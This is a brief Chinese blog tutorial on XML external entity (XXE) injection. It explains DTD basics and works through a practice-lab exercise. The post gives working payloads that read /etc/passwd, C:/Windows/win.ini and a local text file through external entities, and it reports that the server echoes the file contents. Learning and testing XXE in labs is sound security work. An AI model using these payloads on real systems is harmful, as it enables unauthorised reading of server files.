XXE

概述

XXE-xml external entity injection
xml外部实体注入漏洞
XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害
知识点:

  • XML声明:
    例子:<?xml version="1.0"> XML是区别大小写的。
    • version 版本
    • encoding 字符编码集
    • standalone 是否为独立文档
  • DTD文档类型定义:Document Type Definition 文档类型定义,即XML的一种约束
    • 在XML中加入申明:内部 <!DOCTYPE 根标签名[]>;外部 <!DOCTYPE 文档根节点 SYSTEM "DTD文件名">
  • 文档元素:
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

外部实体引用Payload:

<?xml version="1.0"?>
<!DOCTYPE ANY[
	<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>

题目:
1
提交一个正常的xml数据:

<?xml version = "1.0"?>
<!DOCTYPE note [
    <!ENTITY hacker "test">
]><name>&hacker;</name>

1
Payload:

<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///C://Windows//win.ini">
]>
<x>&f;</x>

可获取服务器上文件内容:
1

或者,我自己在桌面上随便新建了一个txt,随便输入内容,然后构造payload:

<?xml version="1.0"?>
<!DOCTYPE ANY[
	<!ENTITY f SYSTEM "file:///Desktop/1.txt">
	]>
<x>&f;</x>

直接回显txt中的内容了。
1

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值